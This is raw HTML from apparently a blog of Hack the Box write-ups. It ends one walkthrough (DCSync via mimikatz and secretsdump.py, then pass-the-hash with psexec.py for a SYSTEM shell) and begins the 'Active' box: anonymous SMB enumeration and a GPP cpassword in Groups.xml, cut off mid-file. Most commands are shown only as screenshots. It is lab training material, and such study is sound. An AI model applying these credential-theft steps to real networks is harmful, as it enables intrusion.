/static/e5996a90ec85184557aff6f52aa8bdda/679a3/svc_loanmgr-first-degree-object-control.png 315w, /static/e5996a90ec85184557aff6f52aa8bdda/1b0b6/svc_loanmgr-first-degree-object-control.png 472w" sizes="(max-width: 472px) 100vw, 472px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>BloodHound provides two methods of performing the DCSync attack. One way is with mimikatz which is done from within the target windows environment:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 598px; " > <a class="gatsby-resp-image-link" href="/static/7641670df88ea3238ccc4f44aa5addc3/89d5f/dcsync-windows-abuse.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.9620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACJklEQVR42qVRa28SQRSd7yqBVhRasMCysCzIAi2F5eG2UGihQKGkxTTRmGpjYoxJ/4U/RBveL1GxNk38Zcc74ybq5344OefeOXMncy6rtl+g/vw1ap1zNM4ucNA8Q7l2inK9I1AiXTo8wR6BMz/jvT1Tl81z3qs1O2B6sQmjcopcuY1cqQXdqAqkjQr0nSqy1Hu234ZxcELnx9ALR+Q9FjW/y+s83eWeNGkWSBSQyNcQSe/DF0nj8UYITk+YEILDo0JNFpEqtGhwG1qmAkkzEM8f0rAWAoldyLEdRKm/ZTQQ3CyCeZRNBKJphOJZhGJZKJoONZ4hbYL3RZ01dVb41URO6DCxSqyQ1y1rYOtSFLHULhUxWB55YXX4sbImC1idfgEbx5rJThkWuxer6wHYyGt1SMSS6N1bcYOdv/2A5fUN+sMphuMZRtMvGBALPSE9mgoeTeYCfaqHk5nwcO/86xLT+Tfc3P7Cm3eXYK8u3mNMB5+u+ugOJjR4QjzG5+4APap7pPljg9FM8FVvKNDtj2ngAovv15gvlvjx8xZ8FnP5NZFbkHIJEvN85EiKaoKW+S8j7uN5yk9T5NPB74oFeiN4YPfgPn2b8ey4MUAmn7pFw7YhqUkxnF+UwknxmD+8LbQYxvvksbuCsLsVrFK2FvsTwUyET6HyZfDQ/7L0J3BT28zl/Luohy6FlufHhpZHqv4SHmLGX7gLbA4fgrkGji4/Qsk38Bs7vo4Nmyj2/QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="DCSync Windows Abuse" title="" src="/static/7641670df88ea3238ccc4f44aa5addc3/89d5f/dcsync-windows-abuse.png" srcset="/static/7641670df88ea3238ccc4f44aa5addc3/dda05/dcsync-windows-abuse.png 158w, /static/7641670df88ea3238ccc4f44aa5addc3/679a3/dcsync-windows-abuse.png 315w, /static/7641670df88ea3238ccc4f44aa5addc3/89d5f/dcsync-windows-abuse.png 598w" sizes="(max-width: 598px) 100vw, 598px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I uploaded mimikatz onto the system and executed it along with the command that extracts the NTLM hash of the <code class="language-text">Administrator</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4208c524e57c3b39c10510fec0de5cd2/9fe72/dcsync-mimikatz.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 89.87341772151898%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAACyElEQVR42o1U2XLaQBDUp4QjWAgd6L4vBAgEBts5ncr//0anZ2U7LseuykPXaNfe3u6eYTXDSGATnp3CCUo4aQ8n3mKdbBEUB7jZuLaf9tx0y3UHw6swNxN8trJXSKBNvSMEE/eIT2ZF1JiY5YhVzlpgxu+ZVWG6yl4ws0rMrRxzu1aYSTUzaLbbwvU6RMEGLlV45QWuKEk28DOuWS2/hLHOsI4aGG6uqh1WsIIKNuGENRzumV5BQr9GQmsOq0ciL92NyPYI8p6HO6y8UsFwC1UXjGdBe1JvFDIF2dMkl6Q+qVykRuWAMD+obyEsuzsq75TidbzhZR10qtUdZmbGmK8izIi5EalvTQ4Xmwult/ynAt3wDTnXUtUF1aCIN4cHNP09945IG15a7JXliR5gZoQv0Bxups2JVmqYfoOAVsVyTCLJUi6SdVQeqLxHWg+88FYRimKT+Zp+paqyHDP4hH/shu+o9w9Kbbm9UypTKkybs1oHuRAwT7fE0skVdOa2klwJyXdhxdAks5w2yu0VsXyTyOfsiU2HDRGI8s+mhM8xMWJMl7T3hKkuCMY9sSyHw/Ko7C04nGLPf7JtUM1EDiwZvCIa6/y5Ce9AszjxMi6iZLkuMOWBcQxydYEQjCTJK8QfE64ZqBfVnLdWHRRrbsI5JMTqa2JR+IyZMeIfwry9IJNRqA5Yhw1HoUHbf0HDBklTKjYkYiQy4HbY8lexGZtDIWNubwjb/ivq3T2a3Z2aMy/bqUchJKRhWXurmqRGiIRCJjD5y3qXMMgObMAebrTBSsaB9iw244ZZ6bS/JHS+KrozWr/hgyAxSDTv2dbEQkbbFRUMtDwk3QvOfKpORE97c+n2f+SoLXhTWp0R8B3cnX6iv31Ef/2F/vKI3fkHhvvfatifR+YvPmiKTgtrqrT9Vg110z+oRsivo+iufByuasg/Inyr8A85HkjSThH5swAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="DCSync mimikatz" title="" src="/static/4208c524e57c3b39c10510fec0de5cd2/50637/dcsync-mimikatz.png" srcset="/static/4208c524e57c3b39c10510fec0de5cd2/dda05/dcsync-mimikatz.png 158w, /static/4208c524e57c3b39c10510fec0de5cd2/679a3/dcsync-mimikatz.png 315w, /static/4208c524e57c3b39c10510fec0de5cd2/50637/dcsync-mimikatz.png 630w, /static/4208c524e57c3b39c10510fec0de5cd2/9fe72/dcsync-mimikatz.png 755w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The other way is done remotely with <code class="language-text">secretsdump.py</code> from <a href="https://github.com/fortra/impacket" target="_blank">Impacket</a>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 595px; " > <a class="gatsby-resp-image-link" href="/static/4a73e31ca236ff6b56a6f7606ddcfb6e/54787/dcsync-linux-abuse.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.12658227848101%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACXElEQVR42p2R60+ScRTHn9durQ11iBgGCA+XB5CLIPJwSXlQrhLGxReudVmvK8UQRNB0zKZNy2ptrb8yX5g8fD2/H7lVr1psn53v7/s9nB0OQrq0gVztGXLVp8jXniNVqEHJlqHkKpxUvvoHt/7fpPIV5IpVCHKqhHimgtjKI8TSZUSXS5CVIvGQ16iyishiDvJSHnKyQAyzKMtJR5JFrqMp5hUh2AIKQg+KcIdXIPqXaGgViUwNiew6guQbrD5MGp3QmyTozS5YvQn44wVaoAL7nAIrfWdWzmJBWeNvwWgPwOKah+hZgMUdxgxpK1XRE6Y6D4sUIoIQybPR2+GVea/kj8HujRAyx0baIPogGKxeuAIxaqRwdoE3OQn2lvwynP4ozI4AdCYXIfFtx+/ZaGM36eHWesomKburNUFYW3+Ciy/f8LZ3gt7JOU7OLnB8es71u/cfSX9A9/AYO3uHaHWO0N7vYbd7hCa9m51DNNoHqDc7aB/0sFregHB69gnsc3n5A9fXP9HvqxioKtR+n7jGYDCAqvY5Awa9h6i8l/lXV1d8xuev3yEkM2vY2ungZb2F7WYXW409zqvtXaqdoUc503Wqm402Xr9pc2+7tU850epS1sVSujT8UzyhBN0rCqdPhkSwW0p0V3cwDtdcHG6C39kX4R7rY+johmNTIr/piMaAkVEDBO20nQcT953QTjt4ZbBDc3/ayY/P9G2uM7IeB0b1Vhpog2bChDuaKWh0ZghjZI7+4nf9L4wb7HzITGgZqRe7sMkFGkgr/zf0U9lAo28RycebEMNp3AAUIMjBLUC1PwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="DCSync Linux Abuse" title="" src="/static/4a73e31ca236ff6b56a6f7606ddcfb6e/54787/dcsync-linux-abuse.png" srcset="/static/4a73e31ca236ff6b56a6f7606ddcfb6e/dda05/dcsync-linux-abuse.png 158w, /static/4a73e31ca236ff6b56a6f7606ddcfb6e/679a3/dcsync-linux-abuse.png 315w, /static/4a73e31ca236ff6b56a6f7606ddcfb6e/54787/dcsync-linux-abuse.png 595w" sizes="(max-width: 595px) 100vw, 595px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cce55de5a3013f22d79589b1103b3e11/d0595/secretsdump.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 96.83544303797468%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAADh0lEQVR42lVU2ZKjRhDkUxyenUNI4m5u1NwIoXO0smfn//8jndXyhsMPGQUIqrMys2StohZ2suAtPeE1GpAWPbQeURFF2cLxM9hOho2bwvVTU4MggxfwnpDq+QncsMDKTWCpvEdWDfDiGo5qsY07OHELL+nhpz08IshGrAONsJjgZwN/78zzD6/Eu1fgzcnxso7xg7CCpIPuLga79oSyXkwt6iN0f0XVyPWCkjUt94jzCbZbYO2WWLOhE+yw9ks2SwysWzHiWk4Gj/pAzPipJ9x3E+uMR3fCTWp7xJnvnvKB6HnNSuxVjZ4sla3wh02GzfiJcb6jGW5ox5upzXBB05Nhs0fL3zTfGZa/0M0P9AdWQu7H0xdyTrKNGriUa+VXsIrmgm66Q4k+cQOfJ3oR9aRmLqtI4mei40BNB1MFbtwZPUVfea4oh8PG1o46ddMn8t0BkRgR99gENfxkpFFsElZ0sEJA03yleUBjzAo5us/DPGIbyfs9tdzBqvsb5uMvTMs3R36gHu8omjOibI+QjFX+ZBTlI0IyDdkwiDVSEoir2fy2Nsbs8EGjrFyfoNsr3ZvhKRnrycxlPrcU200Gw0g+9JLn2B6ZSuNNqJ/NWOV65VHDeqDozZXRuCCtjjyZ4CEltc2rEbXoW86Iij0xGc0Umal8fDaj1jbZScP3bU4N2xs/PJLhAYpjJtWCuDyw8QkZoxSlLUIyVIyMGJewmRjyxo+F0YpjCmxeyzOr0GfG5JOMJMQ3VDxA959kuxgdbYcB5uqt3RwbL6f7JVeOYBokKpuwNhCHP5wCVjs9sF++sD9+Y6I54+EX+vlvZBw700fm7Gyw667QcnB7IeveME+rycRFIDq/O/+O3I0S7DtaoqPTur8bdlFKzWhSyBpRu5haKmopOoZpZ1xX3BbRVhquuIpseDUNdccN4aiCkgZlomsxG6OySvb5ZOIkTV3Vmbx6jFXAxnKAmPJiJ0+X98cvzKdvzOdvM74csmcufzdOiwM15uhaUrDQYWZUWGbPDRGGqV74b8VNqfhxRY2y6mCQixkcM2d8ShpWUEtzLTryXdks0Tbiv07ITEpjE3w2lQhZ3fST416hRCcGN+bpKmM8OK6E3ed4HkPuhA0DLREaseWHb+sMr4LNf/ixTmGF3MGMuZMGAXXZco+3PiMRcBO8HV5XKd7s1DT4jVfev3zE+FOw+j/+AWN6h+VZKgdnAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="secretsdump.py" title="" src="/static/cce55de5a3013f22d79589b1103b3e11/50637/secretsdump.png" srcset="/static/cce55de5a3013f22d79589b1103b3e11/dda05/secretsdump.png 158w, /static/cce55de5a3013f22d79589b1103b3e11/679a3/secretsdump.png 315w, /static/cce55de5a3013f22d79589b1103b3e11/50637/secretsdump.png 630w, /static/cce55de5a3013f22d79589b1103b3e11/d0595/secretsdump.png 753w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Both methods above accomplish the same goal which is to obtain the NTLM hash of the <code class="language-text">Administrator</code>.</p> <p>I used <code class="language-text">psexec.py</code> to pass the hash of the <code class="language-text">Administrator</code> and get a shell as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/224430faaacc501c2f4cfb62e465a641/39600/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 71.51898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACV0lEQVR42m2T/XaaQBTEfZM2IvINAssu3yIqmmrSNjbv/yjT2ZUmOUn/mLMHDve3c+deFm42wi1fsFY3BHJCN15xPN8wPb7icH6F6i7w0y3WcQUnUojFFokYsJE7RDzjYjRnmA+wfIVFWp0huisSdYQoJ6jmEfX2GdX2CfXwE2V/RV5NLOwRZQ3K9oS8HCHUgFQSTrCf9lR3Bwp+3A1X9LtnNP0TVHtl0Q/spj9IeYkdNLDWKZZOZgoePIkHl3IEvtsbfLMiLL3CyABl/Yjd8YaRgP30iuH4h3oh8AZJcKYmhEkNOyyxCigW6UJz8nnp5kbW/H5R1Ge0wzO2+9+o2XrVPaFhqxndbYoDBC90/IKOMrrTReUHqVnyHSgJbJhXx5ZbgmRzMafJjwPpDi8o6hP8UCKg05VuzRVU8QH0Dl9E6QDtUg8kZ3spXeXlCcFmgO1zsmEDN+7hRi3cgEXrDEudqZadmNOa8zPAjdij5iS1Uy0N9aMOaw5j5VXMSqucz4rOWOj9k3yDG9fGYUaH1Wl2eGBue+hLBF0KdeLzZLJMqFRy6n7NIcg70J/BTn4H0ukiJ2jgQHSGHYdTMbeqv5ghSe6o5SiuB9dirbg66pPDWe6cq6cdbrYspBMxIqXyecEL4/iIOB+NYzdssXJLoy9Atv7Wsv5Ycd9S0yqBbCshRP8xTlDD4zD8uIXtaZi6y7vrC1Q71IU7LnKpf7n+YnYypGt90YMtDDRjfhH/Z8uRX4Cf4QubAdsmWL1nndm9lDA/7pBkO9N2P/4ysYRJz9bkG2T1H+Bf/rbCUGnhNXEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/224430faaacc501c2f4cfb62e465a641/50637/root.png" srcset="/static/224430faaacc501c2f4cfb62e465a641/dda05/root.png 158w, /static/224430faaacc501c2f4cfb62e465a641/679a3/root.png 315w, /static/224430faaacc501c2f4cfb62e465a641/50637/root.png 630w, /static/224430faaacc501c2f4cfb62e465a641/39600/root.png 700w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-active/https://mgarrity.com/hack-the-box-active/Tue, 31 Oct 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c1b2a5738a4153947983091fe75109f8/3b67f/active.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAElEQVR42mMQkdX+jxPLAbGM9n8hCS0wDebL4scMuCREgZoFgQYJAGlxLd3/QmA+YUMZcBomqfVf0Vjvf0mR1f+5U63+p5eY/1c21geLi8qRaqCszn9+WY3/tTVe/5+eX/3/zor4/0eOz/pf2uzxn19aAyhPioEg26V0/otoqPxfu7zy/++z6/5fXZXz//KB3v9zF2f9l9DQ+C8spY3TlbhdKKX6v3pi7P/vk8v+r5Zj+7+nO/h/5YSQ/3wSakDDdMgIQ2CEyAHDrDjF7H+Tu9T/pAwjYJgagMVJDkNkQ/mAtIyx0X9BeZ3/AqDkI0dmsoEZKgbEwqCYldXG6zKYgQAC2w2LSEhcjwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Active" title="" src="/static/c1b2a5738a4153947983091fe75109f8/50637/active.png" srcset="/static/c1b2a5738a4153947983091fe75109f8/dda05/active.png 158w, /static/c1b2a5738a4153947983091fe75109f8/679a3/active.png 315w, /static/c1b2a5738a4153947983091fe75109f8/50637/active.png 630w, /static/c1b2a5738a4153947983091fe75109f8/fddb0/active.png 945w, /static/c1b2a5738a4153947983091fe75109f8/3b67f/active.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Active is a Windows machine running Active Directory with an open SMB share that contains an encrypted GPP (Group Policy Preferences) password for the <code class="language-text">SVC_TGS</code> account. After decrypting the password, the credentials can be leveraged for a kerberoast attack, resulting in the TGS for the <code class="language-text">Administrator</code> user. The TGS is encrypted with the password hash of the user which can be cracked offline and then used to obtain a shell as <code class="language-text">nt authority\system</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5048d8bbe851c081c137fa86b23e76ea/14945/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 69.62025316455697%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACYUlEQVR42mVT21biQBDMpyhKCIRkMrnf7yGAuqirT/v/31FbM1F21Yc6nUzomurqwjCDAWb6gnXyC1bUoxwv6I5vGE7vqMcXiHiA7TfYuAXW++yKu13yD/aCe8Io+mdk3QXlcEFYzMjaM4bjbzTTM8n5rX3S32Q6Yh80mtwJ2ivJd1KjaB8R5ROK5gF5cyZOCLMBwq8gghoibCCo/H6X4taKsNrG1/oDuxiGIrE4gox7xPlBE+9FAY9EeXVgreBxbDfsNHay0kr3/qLW5WW2rPWzgpHXj/CTEZIIswkhRzN5k2BTVlN1fUZ34Pj9EyJaIqIOW6+EJUpdFTZOzlrBZDWq/sKmE8p2aS7pZ5Qf2XyisoMmlmEN1y+v2IkcNs+dsNV+KjL1bHEyIy3PCOIRUaa8O6EeXhHzzBI1TJsb3QbccH7dsknj1dlqI3H7zU+1HKNhNFKqSYoHKjuhm98QUuF6X2DPcWxJVfRQb1h7VdPHeiG1gq/x+SRsGJ1uekNWPWF+/IOtW+F2k+Bm7ePmXlBFjJvNp5pIv6+2JPhQ9ZVwWAjb8RUJR+3ndxo/wHLVdke4khuPVHTol87g4p2yYPWNTBOG6YEeTojSmeaPCJKZkWBESKqIba/Bjs2OpxZC87kUoRbjpBw5/EkYJBNJSMoaZUc4klkT9Mvj9riYnVdT1YANPV1x1LuPUVemT0hNuoz/v0JNNl9J1cYDpTia4KvKczfoqbzVgVZRsSUvZUwcfwm6y3wqKwylTgR84Q88NkmO6chWEyi1XjjoZy8adfXTiUEu9F9xTUUKKtDmR6z+AjSGxf1KdK1SAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/5048d8bbe851c081c137fa86b23e76ea/50637/nmap-scan.png" srcset="/static/5048d8bbe851c081c137fa86b23e76ea/dda05/nmap-scan.png 158w, /static/5048d8bbe851c081c137fa86b23e76ea/679a3/nmap-scan.png 315w, /static/5048d8bbe851c081c137fa86b23e76ea/50637/nmap-scan.png 630w, /static/5048d8bbe851c081c137fa86b23e76ea/14945/nmap-scan.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Notable open ports:</p> <ul> <li>88 (Kerberos)</li> <li>135, 593 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389 (LDAP)</li> <li>636 (LDAPS)</li> </ul> <p>Active Directory:</p> <ul> <li>domain name: active.htb</li> <li>hostname: DC</li> </ul> <p>SMB accepted anonymous logon and I was able to list the shares:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c079362a786b82fe4446cd58b52bf84c/6ce55/list-smb-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 45.56962025316456%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1ElEQVR42i2R626jMBSEeZM2BMIdY2Mbc00ITdKblG211f5Z7fu/xexA+2OEsXQ+z8zxwvqGoH5D2Hwib15wvv3G+fmL+oPhfEeUN9gdKgT8hmWHQ6pxSKjcIRED1SMqe8Q8xzx7mfuAtFfI5obueMcw39FO72goZRfU7gzBb2lmPnyBcFdUekJWtkjkRB2RVhNSddrOXuj+Ikg6pOWIcf5FVx9Q7kLAE0TNwWrAPnUIqLw78aErzPgC0y4wpkVeGM4bJJlBRHnZ8I8XLYETJsLG5ZOurhBmgdAzksJiF2vsEofZaZwajYe44X2DwRr0xmy1PLV6O3v98ApVsp+0h2ouW/xcnr5jiAmHzGEXCPiRQlVIpJmEH9fwEz6UNJt8qiPM1gQq+4wkXYEdFGNW5kLYETErSMSIqBgI4/BBQ5Y18qzGY0hoKLAnOEgtK2ngtIGsLLyamy1pX7BkSaAkMPsBrg43ICPuYwctLSOzr8LxXyOKf9wSWisDIQhU/ResbGBUBze8oR3fIfWCQs3IqYTd+hGjRQ5Hq3FtaxSlRcreaqEI1Ngz/upuvfdy/bo5LDeHy+ayWPsrvxXn3DKB/uqQQxVdPK6O1/5iuzldI6/LW5fzH2/MH+P5zYlDAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec anonymous list smb shares" title="" src="/static/c079362a786b82fe4446cd58b52bf84c/50637/list-smb-shares.png" srcset="/static/c079362a786b82fe4446cd58b52bf84c/dda05/list-smb-shares.png 158w, /static/c079362a786b82fe4446cd58b52bf84c/679a3/list-smb-shares.png 315w, /static/c079362a786b82fe4446cd58b52bf84c/50637/list-smb-shares.png 630w, /static/c079362a786b82fe4446cd58b52bf84c/6ce55/list-smb-shares.png 745w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With read access to the <code class="language-text">Replication</code> share, I used the <code class="language-text">spider_plus</code> module from <code class="language-text">crackmapexec</code> to download it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f4f448620b0ceb4108dbd76e96bf70e6/adb42/anonymous-download-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABIElEQVR42iWQyXLCQAxE/Rk55YBtyuAVj8ezGG9jDF6AUFSSU/4g/3/uKMOhSzpIT612PH6HJz/h5wN0O6E7fcBcnmjHJzJ1grsv4UYSQVYjYj3CvMGO+qQwSLlBXHTYxgo+zWxJTiImpGqGNA+0pwdqc8Oxv0I0C4pqQiYHRLQU/y/rFaJdkeszmDojV6NVxBpSi5iq4zbfCJlB3d+sK9XOYHpEwnuqZwTpEUFSwY81tupqgapbUR7pmBiQlYMFpqVBRO6dt/kXPhvp3fUFrBcLi1hnFza7ksSxCTW88ot6AU4w1V1RDXf64mKBXijgk5z37gf+oQcnN7JZUdArMcH2h8bm4+7FK8dQwc0XyquCpOMHOdqa0vFMUJ5Fb7P8A21XpeD+FNL7AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec anonymous download shares" title="" src="/static/f4f448620b0ceb4108dbd76e96bf70e6/50637/anonymous-download-shares.png" srcset="/static/f4f448620b0ceb4108dbd76e96bf70e6/dda05/anonymous-download-shares.png 158w, /static/f4f448620b0ceb4108dbd76e96bf70e6/679a3/anonymous-download-shares.png 315w, /static/f4f448620b0ceb4108dbd76e96bf70e6/50637/anonymous-download-shares.png 630w, /static/f4f448620b0ceb4108dbd76e96bf70e6/adb42/anonymous-download-shares.png 741w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The share looked to be a replication of <code class="language-text">SYSVOL</code>. I found <code class="language-text">Groups.xml</code> which stores Group Policy Preferences:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 596px; " > <a class="gatsby-resp-image-link" href="/static/dbd678f00726cbf7650fb67aba078824/8ab7a/replication-share-tree.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 74.0506329113924%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACO0lEQVR42oWS4ZKaMBSFfRVJEAKKQCCgIqhoXXbZXddO7bTTdqfT7Uzf/wVOb4Lr1K62P84khORLzr2nN0hq2PkOXO3BZANHLqDKBtP6AZPFHYr1A5bN3sxnqxZFfY/p4hZZ1WCxfcKSpNe1RDRDbxBW4NEaLFiC+TMwN4FlJGEJPcZGzCgihWBC0l7V/ScxLzXitNZzggIi2cKdfwMrX8CSHdioAgtr0uo41uZSHm9I78DHJR3uAH+rZwll6EFSYTxtMV49Q9Zf4BWf0Y9bAjRg8RacysET+k5J4RLcuwJkXkbAHH5MwKSEm9xgNP+AuNrDkytYDtkT2pK2Jo1dTvNLsD+AGQFLiHEBP2vhVt/hTg+w4xtzGdMu/PwkbpT9H6jHoSwxGM0g8ic41U/Y8x8YpPewCWAPJ3jdz71/AtURmGNEtRxQM2yqm5PewZ/sIIs7RPmaLqtOwGvQnuVEJiJ+VNAGhWFcwBnP4WQ72LOvcOMazlDRCxX6DkVHx8TU9BX6Bkg5G4Twg4zAGQHoJRT2tHqEWr7HdHNAkN/ClZsuq2OK0ag0rs5eqsGesZybRWdEdpXu8CekzS8E5UeKx8ZEpR9Rc2QLlj6CqSfK5bpr1Jn9E7BbsEQGEUzgxSuTQTs/wIqa7oC2SGUxEvLM8lWggRpwCptCK1QLp3wGpzpyedvZ0l3W0Tm6eisNPOWqk95sHW90wxLDvEVS3l/s8iX1htTdSC0QqqWRCOcIs5pgc/TdtLN3weI14G9GMtgxrVZ1gQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="replication share tree" title="" src="/static/dbd678f00726cbf7650fb67aba078824/8ab7a/replication-share-tree.png" srcset="/static/dbd678f00726cbf7650fb67aba078824/dda05/replication-share-tree.png 158w, /static/dbd678f00726cbf7650fb67aba078824/679a3/replication-share-tree.png 315w, /static/dbd678f00726cbf7650fb67aba078824/8ab7a/replication-share-tree.png 596w" sizes="(max-width: 596px) 100vw, 596px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Viewing <code class="language-text">Groups.xml</code> revealed a GPP encrypted password within the <code class="language-text">cpassword</code> attribute:</p> <div class="gatsby-highlight" data-language="xml"><pre class="language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="utf-8"?></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>Groups</span> <span class="token attr-name">clsid</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>{3125E937-EB16-4b4c-9934-544FC6D24D26}<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>User</span> <span class="token attr-name">clsid</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}<span class="token punctuation">"</span></span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token 